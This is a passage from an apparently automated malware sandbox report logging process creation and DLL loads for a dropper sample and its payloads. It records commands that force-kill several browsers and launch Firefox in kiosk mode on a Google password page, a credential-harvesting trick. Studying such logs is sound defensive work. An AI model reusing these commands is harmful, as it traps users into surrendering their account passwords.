Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20230927232528 -prefsHandle 2244 -prefMapHandle 2236 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91716696-7f11-4900-9d33-9e5d096728d3} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb6d310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20230927232528 -prefsHandle 3908 -prefMapHandle 3912 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dd50345-4e1a-4a0d-ac3a-34bdbd555491} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb43510 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4744 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5080 -prefMapHandle 5076 -prefsLen 33185 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7dd9b6f-0496-49cf-b3a6-fd4ff652e245} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1def0e90f10 utility
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: apphelp.dll
